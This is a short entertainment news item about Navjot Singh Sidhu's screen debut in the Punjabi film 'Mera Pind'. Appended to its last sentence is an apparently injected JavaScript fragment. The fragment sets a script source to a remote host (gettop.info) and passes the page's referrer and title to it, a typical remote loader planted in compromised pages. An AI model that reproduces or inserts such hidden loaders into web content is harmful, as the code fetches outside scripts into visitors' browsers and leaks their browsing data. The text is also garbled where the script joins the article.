Looks like former cricketer Navjot Singh Sidhu is adding another feather to his already crowded cap. He was a cricketer, commentator, member of Parliament, a judge for a Tv show and now he is all set to debut on the silver screen.
Sidhu is going to debut with a Punjabi movie called “Mera Pind” which is due release on Sept 5. The film is directed by cinematographer Manmohan Singh who has worked with Yash Raj Films earlier.
He cast Sidhu in a role of a non-resident Indian, who returns to India for good. He tries to uplift the village folks of Punjab, exhorting them to be entrepreneurs in their own homeland rather than aspiring to show off their entrepreneurship abroad.
“I being a Punjabi can play the role I portray in `Mera Pind’ more emphatically than anyone else.” Sidhu said at the movie launch. “But when Manmohanji offered me a role in `Mera Pind’, I could not decline because I found my role to be very close to my heart,” Sidhu added.
Sidhu was also offered a role in Vipul Shah’s Singh is Kinng but he turned the offer down. We hope he and his characteristic Sidhuisms emerge as a King on the silver screen.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
